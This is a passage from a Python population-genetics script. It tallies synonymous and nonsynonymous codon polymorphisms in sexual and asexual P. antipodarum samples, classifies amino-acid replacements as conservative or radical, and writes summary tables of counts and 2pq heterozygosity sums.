asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
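# Remaining cases cannot be polarized against the outgroup codon; write the site and record it in the logfile.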
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa)
sys.stdout.write('\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa)
sys.stdout.write('\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
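# No usable outgroup codon: take the allele outside the most divergent pair (ab, ac, bc hold pairwise difference counts) as the putative ancestor; ties fall through without reassigning codonList1/codonList2.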
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
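# Translate both codon pairs; in the first codon of the gene (i < 3), alternative start codons are read as M.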
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + ';' + aaList1[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
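# Biallelic codon: the product of the two allele frequencies times 2 gives the 2pq heterozygosity.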
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
asex_synS += 2
asex_sum2PQ_S += (2*twoPQ)
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\n')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa)
sys.stdout.write('\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
i += 1
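# Stringify all accumulated counts and 2pq sums for the tab-separated summary written below.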
asex_sum2PQ_S = str(asex_sum2PQ_S)
asex_sum2PQ_N = str(asex_sum2PQ_N)
asex_sum2PQ_C1 = str(asex_sum2PQ_C1)
asex_sum2PQ_C2 = str(asex_sum2PQ_C2)
asex_sum2PQ_C3 = str(asex_sum2PQ_C3)
asex_sum2PQ_C4 = str(asex_sum2PQ_C4)
asex_sum2PQ_C5 = str(asex_sum2PQ_C5)
asex_sum2PQ_C6 = str(asex_sum2PQ_C6)
asex_sum2PQ_C7 = str(asex_sum2PQ_C7)
asex_sum2PQ_R1 = str(asex_sum2PQ_R1)
asex_sum2PQ_R2 = str(asex_sum2PQ_R2)
asex_sum2PQ_R3 = str(asex_sum2PQ_R3)
asex_sum2PQ_R4 = str(asex_sum2PQ_R4)
asex_sum2PQ_R5 = str(asex_sum2PQ_R5)
asex_sum2PQ_R6 = str(asex_sum2PQ_R6)
asex_sum2PQ_R7 = str(asex_sum2PQ_R7)
asex_sum2PQ_meanC = str(asex_sum2PQ_meanC)
asex_sum2PQ_meanR = str(asex_sum2PQ_meanR)
asex_synS = str(asex_synS)
asex_nsynS = str(asex_nsynS)
asex_con1S = str(asex_con1S)
asex_con2S = str(asex_con2S)
asex_con3S = str(asex_con3S)
asex_con4S = str(asex_con4S)
asex_con5S = str(asex_con5S)
asex_con6S = str(asex_con6S)
asex_con7S = str(asex_con7S)
asex_meanConS = str(asex_meanConS)
asex_rad1S = str(asex_rad1S)
asex_rad2S = str(asex_rad2S)
asex_rad3S = str(asex_rad3S)
asex_rad4S = str(asex_rad4S)
asex_rad5S = str(asex_rad5S)
asex_rad6S = str(asex_rad6S)
asex_rad7S = str(asex_rad7S)
asex_meanRadS = str(asex_meanRadS)
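# Write the conservative/radical summary table: interspecific divergence first, then polymorphism rows for all P. antipodarum, sexual, and asexual samples.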
summaryFile = open('mt_conRad_summary.txt','w')
summaryFile.write('\tS\tN\tmeanC\tmeanR\tC1\tR1\tC2\tR2\tC3\tR3\tC4\tR4\tC5\tR5\tC6\tR6\tC7\tR7\nP.antipodarum-P.estuarinus\t' + str(dS) + '\t' + str(dN) + '\t' + str(dMeanC) + '\t' + str(dMeanR) + '\t' + str(dC1) + '\t' + str(dR1) + '\t' + str(dC2) + '\t' + str(dR2) + '\t' + str(dC3) + '\t' + str(dR3) + '\t' + str(dC4) + '\t' + str(dR4) + '\t' + str(dC5) + '\t' + str(dR5) + '\t' + str(dC6) + '\t' + str(dR6) + '\t' + str(dC7) + '\t' + str(dR7) + '\nP.antipodarum-P.estuarinus Sites\nP.antipodarum-P.estuarinus D\nP.antipodarum-P.estuarinus k (JC-corrected)\nP. antipodarum-P.estuarinus var(k)\n\nP. antipodarum\t' + synS + '\t' + nsynS + '\t' + meanConS + '\t' + meanRadS + '\t' + con1S + '\t' + rad1S + '\t' + con2S + '\t' + rad2S + '\t' + con3S + '\t' + rad3S + '\t' + con4S + '\t' + rad4S + '\t' + con5S + '\t' + rad5S + '\t' + con6S + '\t' + rad6S + '\t' + con7S + '\t' + rad7S + '\n')
summaryFile.write('P.antipodarum Sites\nP.antipodarum sum(2*pq)\t' + sum2PQ_S + '\t' + sum2PQ_N + '\t' + sum2PQ_meanC + '\t' + sum2PQ_meanR + '\t' + sum2PQ_C1 + '\t' + sum2PQ_R1 + '\t' + sum2PQ_C2 + '\t' + sum2PQ_R2 + '\t' + sum2PQ_C3 + '\t' + sum2PQ_R3 + '\t' + sum2PQ_C4 + '\t' + sum2PQ_R4 + '\t' + sum2PQ_C5 + '\t' + sum2PQ_R5 + '\t' + sum2PQ_C6 + '\t' + sum2PQ_R6 + '\t' + sum2PQ_C7 + '\t' + sum2PQ_R7 + '\n')
summaryFile.write('P.antipodarum π\nP.antipodarum π/πS\nP. antipodarum aN\nP. antipodarum theta\nP.antipodarum theta/thetaS\n\n')
summaryFile.write('Sex\t' + sex_synS + '\t' + sex_nsynS + '\t' + sex_meanConS + '\t' + sex_meanRadS + '\t' + sex_con1S + '\t' + sex_rad1S + '\t' + sex_con2S + '\t' + sex_rad2S + '\t' + sex_con3S + '\t' + sex_rad3S + '\t' + sex_con4S + '\t' + sex_rad4S + '\t' + sex_con5S + '\t' + sex_rad5S + '\t' + sex_con6S + '\t' + sex_rad6S + '\t' + sex_con7S + '\t' + sex_rad7S + '\n')
summaryFile.write('Sex Sites\nSex sum(2*pq)\t' + sex_sum2PQ_S + '\t' + sex_sum2PQ_N + '\t' + sex_sum2PQ_meanC + '\t' + sex_sum2PQ_meanR + '\t' + sex_sum2PQ_C1 + '\t' + sex_sum2PQ_R1 + '\t' + sex_sum2PQ_C2 + '\t' + sex_sum2PQ_R2 + '\t' + sex_sum2PQ_C3 + '\t' + sex_sum2PQ_R3 + '\t' + sex_sum2PQ_C4 + '\t' + sex_sum2PQ_R4 + '\t' + sex_sum2PQ_C5 + '\t' + sex_sum2PQ_R5 + '\t' + sex_sum2PQ_C6 + '\t' + sex_sum2PQ_R6 + '\t' + sex_sum2PQ_C7 + '\t' + sex_sum2PQ_R7 + '\n')
summaryFile.write('Sex π\nSex π/πS\nSex aN\nSex theta\nSex theta/thetaS\n\n')
summaryFile.write('Asex\t' + asex_synS + '\t' + asex_nsynS + '\t' + asex_meanConS + '\t' + asex_meanRadS + '\t' + asex_con1S + '\t' + asex_rad1S + '\t' + asex_con2S + '\t' + asex_rad2S + '\t' + asex_con3S + '\t' + asex_rad3S + '\t' + asex_con4S + '\t' + asex_rad4S + '\t' + asex_con5S + '\t' + asex_rad5S + '\t' + asex_con6S + '\t' + asex_rad6S + '\t' + asex_con7S + '\t' + asex_rad7S + '\n')
summaryFile.write('Asex Sites\nAsex sum(2*pq)\t' + asex_sum2PQ_S + '\t' + asex_sum2PQ_N + '\t' + asex_sum2PQ_meanC + '\t' + asex_sum2PQ_meanR + '\t' + asex_sum2PQ_C1 + '\t' + asex_sum2PQ_R1 + '\t' + asex_sum2PQ_C2 + '\t' + asex_sum2PQ_R2 + '\t' + asex_sum2PQ_C3 + '\t' + asex_sum2PQ_R3 + '\t' + asex_sum2PQ_C4 + '\t' + asex_sum2PQ_R4 + '\t' + asex_sum2PQ_C5 + '\t' + asex_sum2PQ_R5 + '\t' + asex_sum2PQ_C6 + '\t' + asex_sum2PQ_R6 + '\t' + asex_sum2PQ_C7 + '\t' + asex_sum2PQ_R7 + '\n')
summaryFile.write('Asex π\nAsex π/πS\nAsex aN\nAsex theta\nAsex theta/thetaS\n\n')
summaryFile.close()
logfile.close()
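# CRI(aaList) classifies an amino-acid replacement under seven property schemes plus their mean; callers treat 0 (scheme entries) and <= 0.5 (mean) as conservative. The tables below map ordered amino-acid pairs, including stops (*), to "C" (conservative) or "R" (radical).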
def CRI(aaList):
aaSchemeList = [1,2,3,4,5,6,7]
aaSchemeDict = {1:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C